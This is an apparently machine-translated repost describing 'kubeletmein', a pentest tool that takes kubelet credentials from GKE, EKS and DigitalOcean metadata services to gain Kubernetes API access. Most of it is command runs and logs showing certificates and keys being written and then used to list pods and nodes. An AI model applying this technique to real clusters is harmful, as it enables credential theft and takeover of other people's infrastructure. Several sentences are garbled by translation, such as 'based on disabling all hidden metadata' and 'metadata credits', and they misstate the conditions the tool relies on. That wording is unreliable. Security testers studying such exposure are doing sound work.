kubeletmein: Security program for Kubernetes

kubeletmein is a simple pentest tool that exploits cloud threats in a Kubernetes cluster to access the k8s API.

This access can be used to further control applications running in the cloud or in many other cases, facilitating complete control of Kubernetes.

Supported providers and use

G.K.E.

The GKE ( Google Kubernetes Engine) is fully supported and based on disabling all hidden metadata.

root@kubeletmein-vulnerable:/# kubeletmein generate
2021-03-04T22:25:52Z [ℹ]  fetching kubelet creds from metadata service
2021-03-04T22:25:52Z [ℹ]  writing ca cert to: ca-CERTIFICATES.crt
2021-03-04T22:25:52Z [ℹ]  writing kubelet cert to: kubelet.crt
2021-03-04T22:25:52Z [ℹ]  writing kubelet key to: kubelet.key
2021-03-04T22:25:52Z [ℹ]  generating bootstrap-kubeconfig file at: bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ]  wrote bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ]  using bootstrap-config to request new cert for node: kubeletmein-node
2021-03-04T22:25:53Z [ℹ]  got new cert and wrote kubeconfig
2021-03-04T22:25:53Z [ℹ]  now try: kubectl --kubeconfig kubeconfig get pods
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get pods
NAME                     READY   STATUS    RESTARTS   AGE
kubeletmein-vulnerable   1/1     Running   0          12m
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get nodes
NAME                                                  STATUS   ROLES    AGE   VERSION
gke-kubeletmein-kubeletmein-vulnerabl-6623dbee-mgkd   Ready       11m   v1.18.12-gke.1210

EKS

Support for Amazon Elastic Kubernetes Service was originally added by @ airman604 based on startup script AWS EKS. This has been extended to provide support for various types of user data encountered in EKS.

Specifically, it will support cloud-config formats and shell script. In the latter case, the program tries to parse the /etc/eks/bootstrap.sh command line arguments and retrieve the values ​​it needs from there.

~ $ kubeletmein generate 2021-03-02T21:37:59Z [ℹ] running autodetect 2021-03-02T21:37:59Z [ℹ] EKS detected 2021-03-02T21:37:59Z [ℹ] fetching cluster information from user-data from the metadata service 2021-03-02T21:37:59Z [ℹ] getting IMDSv2 token 2021-03-02T21:37:59Z [ℹ] getting user-data 2021-03-02T21:37:59Z [ℹ ] generating EKS node kubeconfig file at: kubeconfig 2021-03-02T21:37:59Z [ℹ ] wrote kubeconfig 2021-03-02T21:37:59Z [ℹ ] then try: kubectl --kubeconfig kubeconfig get pods

Digital Ocean

Supported by default, DO provides metadata credits and this cannot be disabled.

root @ kubeletmein-vulnerable: / # kubeletmein generate 2021-03-04T23: 39: 46Z [ℹ] running autodetect 2021-03-04T23: 39: 46Z [ℹ] DigitalOcean detected 2021-03-04T23: 39: 46Z [ℹ] fetching kubelet creds from metadata service 2021-03-04T23: 39: 46Z [ℹ] writing ca cert to: ca-certificates.crt 2021-03-04T23: 39: 46Z [ℹ] generating bootstrap-kubeconfig file at: bootstrap-kubeconfig 2021-03-04T23: 39: 46Z [ℹ] wrote bootstrap-kubeconfig 2021-03-04T23: 39: 46Z [ℹ] using bootstrap-config to request new cert for node: kubeletmein-node 2021-03-04T23: 39: 46Z [ℹ] got new cert and wrote kubeconfig 2021-03-04T23: 39: 46Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods root @ kubeletmein-vulnerable: / # kubectl --kubeconfig kubeconfig get pods NAME READY STATUS RESTARTS AGE kubeletmein-vulnerable 1/1 Running 0 6m12s

You can download the program from here.